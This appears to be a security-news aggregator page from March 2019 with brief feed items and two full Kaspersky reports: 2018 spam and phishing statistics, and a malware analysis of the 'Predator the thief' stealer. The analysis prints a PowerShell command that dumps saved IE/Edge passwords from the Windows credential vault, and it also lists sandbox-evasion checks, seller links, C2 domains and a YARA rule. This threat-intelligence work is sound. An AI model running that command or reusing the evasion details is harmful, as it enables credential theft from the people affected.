Viry a Červi

Facebook sues developers over data-scraping quizzes

Sophos Naked Security - 12 Březen, 2019 - 14:20
Downloaded by 63K users, the quizzes promised answers to questions such as "What kind of dog are you according to your zodiac sign?"

Study throws security shade on freelance and student programmers

Sophos Naked Security - 12 Březen, 2019 - 13:23
A recent study shows that if you aren't prepared to ask or pay for security, you probably won't get it.

Citrix admits attackers breached its network – what we know

Sophos Naked Security - 12 Březen, 2019 - 13:22
On Friday, software giant Citrix issued a short statement admitting that hackers recently managed to get inside its internal network. According to a statement by chief information security officer Stan Black, the company was told of the attack by the FBI on 6 March, since when it had established that attackers had taken “business documents” […]

Email list-cleaning site may have leaked up to 2 billion records

Sophos Naked Security - 12 Březen, 2019 - 13:10
The number of records exposed online by Verification.io email list-cleaning service may be far higher than originally anticipated.

John Oliver bombards the FCC with anti-robocall robocall campaign

Sophos Naked Security - 12 Březen, 2019 - 12:37
The Last Week Tonight host launched an anti-robocalling robocalling campaign to force the FCC to put a stop to the pervasive, irritating calls.

Spam and phishing in 2018

Kaspersky Securelist - 12 Březen, 2019 - 11:00

Numbers of the year
  • The share of spam in mail traffic was 52.48%, which is 4.15 p.p. less than in 2017.
  • The biggest source of spam this year was China (11.69%).
  • 74.15% of spam emails were less than 2 KB in size.
  • Malicious spam was detected most commonly with the Win32.CVE-2017-11882 verdict.
  • The Anti-Phishing system was triggered 482,465,211 times.
  • 18.32% of unique users encountered phishing.
Global events and spam GDPR

In the first months of the year alone, we registered a great many emails in spam traffic connected in some way to the EU General Data Protection Regulation (GDPR). It was generally B2B spam — mostly invitations to paid seminars, webinars, and workshops promising to explain the ins and outs of the new regulation and its ramifications for business.

During this period, there was an upturn in legitimate mailings too. Following the requirements of the regulation, companies sent out notifications on the transition to the GDPR policy requesting user consent to store and process personal data. Unsurprisingly, scammers tried to take advantage. Seeking to gain access to the personal data of clients of well-known companies, they sent out GDPR-related phishing emails prompting to update account information. Users who followed the link in the message and entered the required data immediately had it stolen by the fraudsters. It is worth noting that cybercriminals were interested largely in the data of clients of financial organizations and companies providing IT services.


Phishing emails exploiting the GDPR topic

2018 FIFA World Cup

The FIFA World Cup was one of the main media events of the year, reaching far beyond the world of sport. Scammers exploited the World Cup topic using a variety of classic deception methods based on social engineering. Cybercriminals created fake FIFA partner websites to gain access to victims’ bank accounts, carried out targeted attacks, and set up fake login pages for fifa.com accounts.


Examples of messages with World Cup ticket and trip giveaways

New iPhone launch

As is now customary, Apple’s unveiling of its latest device caused a spike in spam sent, supposedly, from Chinese companies offering accessories and replica gadgets. Such messages redirect the recipient to newly created, generic online stores, which willingly accept payments, but are not so great when it comes to dispatching goods.

The release coincided with a slight rise in the number of phishing messages exploiting the Apple brand (and its services), and emails with malicious attachments:

Malware and the corporate sector

In 2018, the number of malicious messages in spam was 1.2 times less than in 2017; Mail Anti-Virus was triggered a total of 120,310,656 times among Kaspersky Lab clients.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of Mail Anti-Virus triggerings among Kaspersky Lab clients in 2018 (download)

2018 saw a continuation of the trend for attention to detail in email presentation. Cybercriminals imitated actual business correspondence using the companies’ real details, including signatures and logos. To bypass security solutions (and convince users that files were safe), ISO, IQY, PIF, and PUB attachments were used, all non-typical formats for spam.

Credit organizations remain one of the most popular targets, and this trend is likely to continue in 2019. We also expect an increase in the number of attacks on the corporate sector as a whole.

New distribution channels

We have mentioned before that the distribution of phishing and other fraudulent content has gone beyond the scope of mailings. Scammers are not only testing new means of delivery, but getting victims themselves to distribute malicious content. Some of this year’s most massive attacks we registered in messengers and social networks.

“Self-propagating” phishing messages are similar to long-forgotten chain letters. They refer to non-existent giveaways or free lucrative offers, with one of the conditions for participation being to forward the message to friends or publish it on social media. At the start of the year, scammers used free air ticket lotteries as a bait, before switching to mailings supposedly from popular retail chains, restaurants, stores, and coffee bars. WhatsApp was the most common tool for distributing such messages.

Cryptocurrencies and spam

In 2018, far from waning, spammers’ interest in cryptocurrencies rose. Among the spam messages were fraudulent ones attempting to coerce potential victims into transferring money to cryptocurrency wallets.

One of the most popular kinds of fraud seen last year was “sextortion.” This type of ransom scam is based on the claim to be in possession of private information of an intimate nature. To avoid disclosure, the victim is told to transfer money to the cryptocurrency wallet specified in the message, which often looks very convincing and uses the victim’s actual personal data: name, passwords, phone numbers, etc. Against the backdrop of endless news reports about personal data leaks, such threats, backed up by real details, cause victims to panic and give in to the cybercriminals’ demands. Last year, the ransom sum ranged from a few hundred to several thousand dollars.

Initially, the mailings were aimed at an English-speaking audience, but at the end of Q3 we registered a wave of messages in other languages: German, Italian, Arabic, Japanese, French, Greek, and others.

Neither did the scammers forget about other fraud methods. Over the year, we identified fraudulent mailings supposedly from large charitable organizations asking to help children by purchasing some data etc. All these schemes had a common thread: The money transfer was requested in cryptocurrency. It should be noted that such messages were very few compared with the mailings described above.

In 2019, spammers will continue to exploit the cryptocurrency topic. We expect to see more fraudulent mailings aimed at both extracting cryptocurrency and gaining access to personal accounts with various cryptocurrency services.

Phishing Cryptocurrency

Cryptocurrency remains one of the most common phishing topics. In 2018, our Anti-Phishing system prevented 410,786 attempts to redirect users to phishing sites imitating popular cryptocurrency wallets, exchanges, and platforms. Fraudsters are actively creating fake login pages for cryptocurrency services in the hope of getting user credentials.

Another hot topic last year was fake ICOs. Scammers invited victims to invest in various initial coin offerings not only by email, but through social media posts as well. There was something for everyone: One of the scams, for example, targeted buzcoin, a cryptocurrency named after Russian singer Olga Buzova. The cybercrooks managed to get hold of the project mailing list and send fake presale invitations to subscribers the day before the start of the ICO. Before the bona fide organizers had time to sneeze, the attackers had scooped around $15,000.

But it was the blockchain project of Pavel Durov, TON, which had the dubious honor of most fakes back in early 2018. The cryptocurrency boom and rumors in late 2017 about an ICO from the creator of Telegram provided fertile ground. Many people believed the scammers and, despite warnings from Pavel himself on social media, transferred money to them.

Lotteries and surveys

Another way to nudge victims into transferring money is via the promise of a guaranteed lottery win or a reward for taking part in a poll. In 2018, our security solutions blocked 3,200,180 attempted redirects to fraudulent websites offering lotteries or surveys.

To take part in the draw, users are asked to make a contribution: the more you give, the more you (supposedly) get. Survey scams work in a similar way. The victim is asked to transfer a sum of money to pay for “administrative costs,” after which the reward will be transferred, or so it is promised.

Universities

Phishers hunt not only for money, but also for knowledge: Over the past year, we registered phishing attacks against 131 universities in 16 countries. More than half (83) were in the US, followed by Britain (21), and Australia and Canada (7 each). One high-profile incident was the theft of millions of documents (including nuclear energy research) from several British universities.

Taxes

In Q1 (the last quarter of the financial year in many countries), we observed a large number of phishing pages imitating the websites of HMRC (UK), the IRS (US), and other countries’ tax authorities. Cybercriminals tried to finagle personal data, answers to security questions, bank account information, and other data from users. Some fake tax service sites distributed malware.


Fake tax service websites

HTTPS

As we wrote a year earlier, the number of phishing pages on domains with SSL certificates has increased. Ironically, this was facilitated by the widespread adoption of HTTPS, since pages with a certificate (and padlock) are trusted far more. But getting hold of a certificate is not hard, especially for competent cybercriminals. The problem has taken on such dimensions that since September 2018 with the latest version of Chrome, the browser has stopped highlighting HTTPS sites with a green padlock in the address bar and marking them as “Secure.” Instead, the “Not secure” label is now assigned to sites without HTTPS.

Sales

Every year, November sees the start of the sales season. First up is World Shopping Day, followed by Black Friday. Cybercriminals prepare for such events in advance and commence their mass attacks long before the sales start. According to our statistics, the number of attempts to redirect users to fraudulent websites exploiting the sales topic starts to rise at the end of October.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Fraudsters use standard methods to extract personal data and money from victims, including fake websites mimicking popular online stores with huge discounts on expensive goods.

Statistics: spam Proportion of spam in email traffic

The share of spam in email traffic in 2018 decreased by 4.15 p.p. to 52.48%.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Proportion of spam in global email traffic, 2018 (download)

The lowest share (47.70%) was recorded in April 2018. The highest (57.26%) belonged to December.

Sources of spam by country

In 2018, China (11.69%) led the list of spamming countries, swapping places with the US and consigning the former leader to second place with 9.04%. Third position went to Germany (7.17%), which climbed into the Top 3 from sixth.

Vietnam, which ranked third last year, fell to fourth place (6.09%). It was followed by Brazil (4.87%), India (4.77%), and Russia (4.29%).

In 8th place, as in 2017, came France (3.34%), while Iran and Italy departed the Top 10. They were replaced by newcomers Spain, which rose from 16th to 9th place (2.20%, +0.72 p.p.), and Britain (2.18%, +0.59 p.p.).

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Sources of spam by country, 2018 (download)

Spam email size

In 2018, the share of very small (up to 2 KB) messages increased significantly. Despite quarterly decline, the annual figure came in at 74.15%, up 30.75 p.p. against the previous reporting period. The proportion of 2–5 KB messages also increased (10.64%, +5.56 p.p.).

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Spam emails by size, 2018 (download)

The volume of larger spam dropped significantly against 2017. The share of messages sized 5–10 KB (7.37%) decreased by 1.77 p.p. and 10–20 KB (3.66%) by 12.6 p.p. The share of spam messages sized 20–50 KB (2.82%) saw the biggest drop, down 18.41 p.p.

Malicious attachments in email Malware families

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Top 10 malware families in 2018 (download)

In 2018, the most widely distributed malicious objects in email, assigned the Exploit.Win32.CVE-2017-11882 verdict, exploited a Microsoft Office vulnerability for executing arbitrary code without the user’s knowledge.

In second place was the Backdoor.Win32.Androm bot, whose functionality depends on additional modules downloaded at the command of the C&C servers. It was most often used to download malware.

The Trojan-PSW.Win32.Fareit family moved up from fifth to third place. Its main task is to steal data (cookies, passwords for various FTP, mail, and other services). The harvested information is sent to the cybercriminals’ server. Some members of the family are able to download and run other malware.

The Worm.Win32.WBVB family, which includes executable files written in Visual Basic 6 (in both P-code and Native mode) and are not trusted in KSN, remained in fourth place.

Fifth place went to the Backdoor.Java.Qrat family — cross-platform multi-functional backdoor written in Java and sold in the Darknet as a Malware-as-a-Service (MaaS) package. It is generally distributed by email in JAR attachments.

Trojan-Downloader.MSOffice.SLoad, a DOC/DOCX document containing a script that can be executed in MS Word, took sixth place. It is generally used to download and install ransomware on user computers.

The spyware Trojan-Spy.Win32.Noon ranked seventh.

The malware Trojan.PDF.Badur, which consists of a PDF document containing a link to a potentially dangerous website, dropped one place to eighth.

Ninth place was taken by the Trojan.BAT.Obfus family of malicious objects — obfuscated BAT files for running malware and changing OS security settings.

In tenth place, as in the previous year, was the family of Trojan downloaders Trojan.Win32.VBKrypt.

Countries targeted by malicious mailshots

As in previous years, first place in 2018 went to Germany. Its share accounted for 11.51% of all attacks. Second place was taken by Russia (7.21%), and Britain (5.76%) picked up bronze.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Countries targeted by malicious mailshots, 2018 (download)

The next three, separated by a whisker, were Italy (5.23%), Brazil (5.10%), and Vietnam (5.09%). Trailing Vietnam by 1.35 p.p. in seventh was the UAE (3.74%). India (3.15%), Spain (2.51%), and Taiwan (2.44%) rounded off the Top 10.

Statistics: phishing

In 2018, the Anti-Phishing system was triggered 482,465,211 times on Kaspersky Lab user computers as a result of phishing redirection attempts (236,233,566 more than in 2017). In total, 18.32% of our users were attacked.

Organizations under attack

The rating of organizations targeted by phishing attacks is based on the triggering of the heuristic component in the Anti-Phishing system on user computers. This component detects all instances when the user tries to follow a link in an email or on the Internet to a phishing page in the event that such links have yet to be added to Kaspersky Lab’s databases.

Rating of categories of organizations attacked by phishers

In 2018, the global Internet portals accounted for the lion’s share of heuristic component triggers. Its slice increased by 11.23 p.p. to 24.72% against the previous year. In second place came the banking sector (21.70%), down 5.3 p.p. Payment systems (14.02%) in 2018 ranked third.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of organizations subject to phishing attacks by category, 2018. (download)

Top 3 organizations under attack from phishers

This rating is made of organizations whose names were most frequently used by phishers (according to the heuristic statistics for triggers on user computers). It was the same lineup as in 2017, but rearranged slightly, with Microsoft in first place.

Microsoft 6.86% Facebook 6.37% PayPal 3.23% Attack geography Countries by share of attacked users

Brazil (28.28%) remains out in front by percentage of attacked unique users out of the total number of users in the country.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Percentage of users on whose computers the Anti-Phishing system was triggered out of all Kaspersky Lab users in the country, 2018 (download)

Top 10 countries by share of attacked users Country % Brazil 28.28 Portugal 22.63 Australia 20.72 Algeria 20.46 Réunion 20.39 Guatemala 20.34 Chile 20.09 Spain 20.05 Venezuela 19.89 Russia 19.76

Top 10 countries by share of attacked users

Despite a slight drop of 0.74 p.p., Brazil (28.28%) remains top by number of attacked users. Meanwhile, Portugal (22.63%) moved up to second place (+5.87 p.p.), displacing Australia (20.72%, –1.79 p.p.).

Conclusion

2018 showed that cybercriminals continue to keep a close eye on global events and use them to achieve their goals. We have seen a steady increase in phishing attacks on cryptocurrency-related resources, and expect new scams to appear in 2019. Despite the fall in value and the lean times for the cryptocurrency market as a whole, phishers and spammers will try to squeeze everything they can out of this topic.

The past year also demonstrated that spammers and scammers will continue to exploit annually occurring events — new smartphone launches, sales seasons, tax deadlines/rebates, and the like.

There is also a trend toward the transition to new channels of content distribution: Cybercriminals in 2018 used new methods of communication with their “audience,” including instant messengers and social networks, releasing wave after wave of self-propagating malicious messages. Hand in hand with this, as illustrated by the attack on universities, fraudsters are seeking not only new channels, but new targets as well.

The Handmaid's Tale or Man-made Fail? Exposed DB of 'BreedReady' women probably not as bad as it sounds

The Register - Anti-Virus - 11 Březen, 2019 - 20:43
Dystopian forced pregnancy scenarios likely a figment of Western media biases

An unprotected MongoDB database of 1.8 million women in China has been taken offline after drawing media attention for the inclusion of a data field designating whether the women are "BreedReady."…

Kategorie: Viry a Červi

Researcher Claims Iranian APT Behind 6TB Data Heist at Citrix

VirusList.com - 11 Březen, 2019 - 20:31
IRIDIUM is an APT that uses proprietary techniques to bypass two-factor authentication for critical applications, according to security firm Resecurity.
Kategorie: Viry a Červi

Google Patches Critical Bluetooth RCE Bug

VirusList.com - 11 Březen, 2019 - 20:14
In all, Google reported 45 bugs in its March update with 11 ranked critical and 33 rated high.
Kategorie: Viry a Červi

Forrester: Ransomware Set to Resurge As Firms Pay Off Attacks

VirusList.com - 11 Březen, 2019 - 18:44
In this video, Josh Zelonis, senior analyst at Forrester Research, discusses the next great security threats to enterprises.
Kategorie: Viry a Červi

NASA's crap infosec could be 'significant threat' to space ops

The Register - Anti-Virus - 11 Březen, 2019 - 17:23
Inspectors not happy with stagnant security practices

NASA's Office of the Inspector General has once again concluded the American space agency's tech security practices are "not consistently implemented".…

Kategorie: Viry a Červi

Hapless engineers leave UK cable landing station gate open, couple of journos waltz right in

The Register - Anti-Virus - 11 Březen, 2019 - 16:40
Infosec skills are useful. But so are locked doors

Journalists were able to bimble into a UK cable landing station almost completely unchallenged after security gates were left open and unlocked.…

Kategorie: Viry a Červi

Facebook Alleges Two Ukrainians Scraped Data From 63K Profiles

VirusList.com - 11 Březen, 2019 - 15:51
Facebook is suing two Ukrainian men who were able to scrape data from 63,000 users' profiles by enticing users to download a malicious browser extension.
Kategorie: Viry a Červi

Just a reminder: We're still bad at securing industrial controllers

The Register - Anti-Virus - 11 Březen, 2019 - 14:30
Moxa boxes caught using plain text passwords and insecure web apps

Bug hunters have discovered yet another set of flaws in industrial control systems used by electric utilities, oil and gas companies, and shipping and transportation providers.…

Kategorie: Viry a Červi

US Army clarifies its killer robot plans

Sophos Naked Security - 11 Březen, 2019 - 13:27
The US Army has been forced to clarify its intentions for killer robots after unveiling a new program to build AI-powered targeting systems last month.

Booking a restaurant? Let Google’s Duplex AI make the call for you

Sophos Naked Security - 11 Březen, 2019 - 12:06
Bon appétit, Dave. Google's table-booking Duplex AI needs to pass the creepy test.

FTC says taxpayer voice phishing scams are up nearly 20x

Sophos Naked Security - 11 Březen, 2019 - 11:50
The real Social Security people will never call to threaten your benefits or tell you to wire money, send cash, or put money on gift cards.

Monday review – the hot 25 stories of the week

Sophos Naked Security - 11 Březen, 2019 - 11:29
From a serious Chrome zero-day to Comcast's security nightmare, and everything in between - it's weekly roundup time.

A predatory tale: Who’s afraid of the thief?

Kaspersky Securelist - 11 Březen, 2019 - 11:00

In mid-February, Kaspersky Lab received a request for incident response from one of its clients. The individual who initially reported the issue to our client refused to disclose the origin of the indicator that they shared. What we do know is that it was a screenshot from one of the client’s internal computers taken on February 11 while an employee was apparently browsing through his emails. In addition, the anonymous source added that the screenshot was transferred to a C2 using a stealer dubbed ‘Predator’.

As soon as the client contacted us, we started conducting a full investigation into the infected machine, including memory dumps, event logs, environment indicators from the network and so on and so forth. Finding very little information about this tool, we decided that seeing as how we’d already dived into the stealer, we might as well share some of our main findings in case other incidents occur in the future. The purpose of this blogpost is to enumerate the Predator stealer’s versions, technical features, indicators and Yara rule signatures, to help monitor and detect new samples, and to provide general information about its owners’ activities.

As well as all the information we collected from the client, we went the extra mile and contacted a source who had previously analyzed Predator. This source was @Fumik0_, a French malware researcher who analyzed versions 2.3.5 and 2.3.7 in his blog just a few months ago (October 2018).

He joined Ido Naor, a principal security researcher at Kaspersky Lab and together they compiled a full analysis of the new versions of ‘Predator the thief’.

The blog was apparently so influential that the owners of the stealer decided to contact Fumik0 via Twitter. An account named Alexuiop1337 claiming to be the owner of Predator is also active and has been responding to Fumik0’s discoveries until fairly recently.

Predator the thief

Predator is a data stealer developed by Russian-speaking individuals. It’s being sold cheaply on Russian forums and has been detected many times in the wild. Although detection is successful with previous versions, its owners are rapidly adapting by generating FUD (Fully UnDetectable) samples every few days. The owners are not responsible for the victim attack vector and are only selling the builder. For a small additional payment they can also generate an administration panel for customers. The newest samples were exposed on their Telegram group; however, the links only redirect to a little-known AV aggregator which we don’t have access to. We’re currently tracking the samples’ hashes and waiting for triggers to show up.

latest version v3.0.7 Sample MD5 bf4cd781920f2bbe57e7e74a775b8e94 Code Language C++ File Types PE Supported Arch. x86 and x64 Unpacked Size <500Kb Admin Panel Example https://predatortop.xyz/login Admin Panel Software PHP, Apache, Ubuntu From v2 to v3

Predator, as a stealer, is considered simple and cheap. It’s good for attacking individuals and small businesses, but as far as large companies go, protection solutions and response teams can detect and remove its activity in a relatively short amount of time.

That said, the owners of Predator are very business oriented. They’re constantly updating their software, attempting to extend features and adjusting to client requirements and are generally not that aggressive when it comes to disclosure/analysis of their tool.

Obfuscation

Predator’s owners decided to obfuscate most of its code with a number of simple techniques. XOR, Base64, Substitutions, Stack strings and more are being used to hide API methods, Folder paths, Register keys, the C2 server/Admin panel and so on.

We sketched a flow chart for one of the obfuscation techniques. A large chunk of code boiled down to one Windows API call, which we see as a bit like overkill considering the fact that other techniques can be applied to strip the obfuscation.

We’ve written down a list for those who are after a step-by-step guide:

Step Description 0 Saving arguments somewhere 1 Get the function name 2 Get the library name 3 Recreating GetProcAddress 4 Calling function by a simple register call Export table

It was also found that the export table trick for getting the API function is far more complex than the one introduced in v2:

Anti-debugging/sandbox checks

Predator retains its old techniques for sandbox evasion, but keeps adding more and more features. One of them, for example, is a hardcoded list of DLLs that are checked if loaded into memory:

sbiedll dbghelp api_log pstorec dir_watch vmcheck wpespy SxIn Sf2

Loop for checking list of DLLs

One old trick, for example, that survived the version update is the check of Graphic Card Name introduced in v2.x.x.

Classy but mandatory – browser stealer support

Edge and Internet Explorer support was recently added to the list of browsers. The actions taken, however, are different from the malware decision-making with the Gecko and Chromium browsers. In previous versions, Predator usually uses a temporary file (*.col format file) to store browser content (in an SQLite3 database), but for Edge and IE it was replaced with a hardcoded PowerShell command that will directly put the content of the file into a dedicated repository..

powershell.exe -Command "[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault; $b = 'Browser: Internet Explorer | Edge'; $a = ($vault.RetrieveAll() | % { $_.RetrievePassword(); $_ } | SELECT UserName, Password, Resource | Format-List Resource, UserName, Password) | Out-String; $c = $b + $a; $c = $c.Replace('Resource :', 'Url:').Replace('UserName :', 'Login:').Replace('Password :', 'Password:'); $c > "%PREDATOR_PATH%\General\IeEdgePasswords.txt"

As a reminder, Predator currently supports the following list of browser data theft, according to the info on the ‘official’ sales page:

The false keylogger feature

The owners of Predator list keylogger capabilities among its features, though a closer inspection of the code reveals that no keylogging is carried out. The behavior we captured is clearly that of a clipboard stealer. The functionality includes a crawler that checks if the clipboard contains data, grabs it and places it in a dedicated file the stealer owners have named ‘information.log’.

Thief logs

Diving into the file discussed in the clipboard stealer section above, we saw drastic changes from previous versions. The information logger is perhaps the most important collector of Predator. It stores all the tasks performed by the stealer on the victim machine.

We noticed that in previous minor versions, logs started collecting data that might be of interest to potential customers, such as:

  • HWID
  • System Language
  • Keyboard Layout

At the end of the report, the owners added a customer/payload ID – probably to improve support.

Updates

Predator is continually integrating new software into the stealing list and fixing bugs to maintain its stability and its popularity. Here’s a summary of the new features in v3:

Location Data stolen Games Osu
Battle.net FTP WinSCP VPN NordVPN 2FA Authy Messengers Pidgin
Skype Operating System Webcam
HWID
Clipboard
Specific document files (Grabber)
Project filenames* Browsers IE/Edge

*We noticed that the newest version of Predator has started collecting a list of .sln file names. These are project files usually generated by Visual Studio. We still have no idea if this is related to client demand for a future feature.

Sale point (Russian forums)

We found a very active seller of Predator on a forum called VLMI. It appears the main language on VLMI is Russian and the content mainly revolves around cyberattacks. In addition, the forum has a very strict set of rules that might get you banned if broken. The two sections (translated using Google) in the image below are examples of forbidden behavior.

It was also appears that each offer on the forum must go through a reviewer who decides if the piece of software or service is of financial benefit to the forum administrators, but at the same time fair towards other members.

For 8,000 rubles (~$120) worth of software, the forum will charge a 20% fee; if the value goes above 100,000 rubles (~$1,500), the commission decreases to 10%.

The Predator stealer’s main sales thread was found here:

https://vlmi.biz/threads/predator-the-thief-nativnyj-stiller-s-bolshim-funkcionalom-luchshaja-cena.21069/

Predator costs 2,000 rubles (~$30) for the stealer and admin panel. There is also an optional service to help the customer install the C&C. This is not as expensive as other stealers on the market, such as Vidar and HawkEye, but its developers are proactive in delivering updates and ensuring a fast and effective support service.

Telegram as a service

Predator’s main channel for updating their customers is Telegram. At the time of writing, the administrators were hosting over 370 members in this group:

https://t.me/PredatorSoftwareChannel

Another update channel is the seller @sett9.

It appears the Predator administrators are demonstrating FUD capabilities by running a sample generated by the builder of their stealer. However, some samples from their latest update (v3.0.7) have already been detected by Kaspersky products as: Trojan-PSW.Win32.Predator.qy (25F9EC882EAC441D4852F92E0EAB8595), while others are detected by heuristics.

https://scanmybin.net/result/af76a5666e5230cf087c270c51c2dfdc4324c365dc6f93c0f3ae7ce24f9db992

https://run4me.net/result/80163ed2bede58aff68a3bdf802917c61c78a05f37a3caf678ce5491f00d39b0

The executables above were not found in VirusTotal. According to the group, the links were posted around August of last year (2018). Numerous media uploads on the Telegram group revealed dozens of infected victims.

On the day we looked at the Telegram group (February 17, 2019), the latest build (v3.0.7) was released. According to the owners’ release notes, it was implemented with WinSCP and NordVPN support.

IOCs IP/Domains: Predator version IP/Domain v3.0.3 15charliescene15[.]myjino[.]ru v3.0.4 axixaxaxu1337[.]us v3.0.5 madoko[.]jhfree[.]net v3.0.6 kristihack46[.]myjino[.]ru v3.0.7 j946104[.]myjino[.]ru Hashes: Predator version MD5 Hash v3.0.3 c44920c419a21e07d753ed607fb6d7ca v3.0.4 cf2273b943edd0752a09e90f45958c85 v3.0.5 b2cbb3d80c8d830a3b3c2bd568ba1826 v3.0.6 dff67a78bb4866f9da5a0c1781ed5348 v3.0.7 25F9EC882EAC441D4852F92E0EAB8595 Yara: rule Predator_The_Thief : Predator_The_Thief { meta: description = "Yara rule for Predator The Thief 3.0.0+" author = "Fumik0_" date = "2018/10/12" update = "2019/02/26" strings: $mz = { 4D 5A } /* Predator V3.0.0+ */ $x1 = { C6 84 24 ?? ?? 00 00 8C } $x2 = { C6 84 24 ?? ?? 00 00 1A } $x3 = { C6 84 24 ?? ?? 00 00 D4 } $x4 = { C6 84 24 ?? ?? 00 00 03 } $x5 = { C6 84 24 ?? ?? 00 00 B4 } $x6 = { C6 84 24 ?? ?? 00 00 80 } /* Predator V3.0.3 -&gt; 3.0.6 */ $y1 = { B8 00 E1 F5 05 } $y2 = { 89 5C 24 0C } $y3 = { FF 44 24 ?? } $y4 = { 39 44 24 0C } $y5 = { BF 00 00 A0 00 } condition: $mz at 0 and ( ( all of ($x*)) or (all of ($y*)) ) }

Freelance devs: Oh, you wanted the app to be secure? The job spec didn't mention that

The Register - Anti-Virus - 11 Březen, 2019 - 07:14
Boffins find pros-for-hire no better at writing secure code than compsci beginners

Freelance developers hired to implement password-based security systems do so about as effectively as computer science students, which is to say not very well at all.…

Kategorie: Viry a Červi
Syndikovat obsah